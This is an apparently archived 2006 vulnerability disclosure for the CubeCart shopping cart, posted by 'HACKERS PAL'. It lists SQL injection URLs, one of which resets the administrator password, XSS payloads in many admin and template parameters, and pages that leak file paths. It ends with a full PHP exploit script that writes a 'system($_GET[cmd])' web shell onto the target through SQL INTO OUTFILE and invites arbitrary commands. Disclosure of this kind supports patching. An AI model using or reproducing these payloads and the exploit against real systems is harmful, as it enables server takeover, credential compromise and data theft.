Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

WebspotBlogging => 3.0 Remote File Include Vulnerabilities

DanPHPSupport => 0.5 Cross Site Scripting Vulnerabilities

QB ( QuickBlogger ) =>1.4 Remote File Include Vulnerabilities

php_news => 2.0 Remote File Include Vulnerabilities

From:	HACKERS PAL <security_(at)_soqor.net>
Date:	27.09.2006
Subject:	CubeCart Multiple input Validation vulnerabilities

Hello,,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


Sql injection


admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
it will reset the password for the administrator
--

admin/forgot_pass.php?submit=1&user_name=-
1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,
18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*
--
view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,
10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
--
view_doc.php?view_doc=-1'%20union%20select%201,2/*
--
admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,
7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
/***************************************/
xss
admin/print_order.php?order_id=<script>alert(document.
cookie);</script>
--
view_order.php?order_id=<script>alert(document.
cookie);</script>
--
admin/nav.php?site_url="><script>alert(document.
cookie);</script><noscript>
admin/nav.php?la_search_home=<script>alert(document.
cookie);</script>
and language variables for this file ..
--
admin/image.php?image=<script>alert(document.
cookie);</script>
--
admin/header.inc.php?site_name=</title><script>alert(document.
cookie);</script>
admin/header.inc.
php?la_adm_header=</title><script>alert(document.
cookie);</script>
admin/header.inc.php?charset='><script>alert(document.
cookie);</script>
and all other variables in this file
--
footer.inc.php?la_pow_by=<script>alert(document.
cookie);</script>
--
header.inc.php?site_name=</title><script>alert(document.
cookie);</script>
and all other variables in the file.
--
/***************************************/

Full path

information.php
language.php
link_navi.php?cat_id=1
list_docs.php
popular_prod.php
sale.php
check_sum.php
spotlight.php
cat_navi.php

/***************************************/

Exploit :-

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* CubeCart Remote sql injection exploit
/*            By : HACKERS PAL
/*             WwW.SoQoR.NeT
/*
/* Tested on CubeCart 2.0.X  and maybe other versions are injected
*/
print_r('
/**********************************************/
/*   CubeCart Remote sql injection exploit    */
/*     by HACKERS PAL <security@soqor.net>    */
/*         site: http://www.soqor.net         */');
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host
/* Example:                                   */
/*  php '.$argv[0].' http://localhost/CubeCart/
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit1="/cat_navi.php";
        Function get_page($url)
        {

                 if(function_exists("file_get_contents"))

                 {

                      $contents = file_get_contents($url);

                         }
                         else
                         {
                             $fp=fopen("$url","r");
                             while($line=fread($fp,1024))
                             {
                              $contents=$contents.$line;
                             }


                                 }
                      return $contents;
        }

    $page = get_page($url.$exploit1);

            $pa=explode("<b>",$page);
            $pa=explode("</b>",$pa[2]);
            $path = str_replace("cat_navi.php","",$pa[0])."soqor.
php";
            $var='\ ';
            $var  = str_replace(" ","",$var);
            $path = str_replace($var,"/",$path);
            $exploit2="/view_doc.php?view_doc=-
1'%20union%20select%20'<?php%20system(".
'$_GET[cmd]'.");%20?>','WwW.SoQoR.
NeT'%20INTO%20OUTFILE%20'$path'%20from%20store_do
cs/*";
    $page_now = get_page($url.$exploit2);
    if(ereg("mysql_fetch_array()",$page_now))
    {
         $newurl=$url."/soqor.php?cmd=id";
         Echo "\n[+] Go TO ".str_replace("//","/",$newurl)."\n[+] Change id to any command you want :)";
    }
    else
    {
         Echo "\n[-] Exploit Faild";
    }
    Die("\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/")
;

?>

#WwW.SoQoR.NeT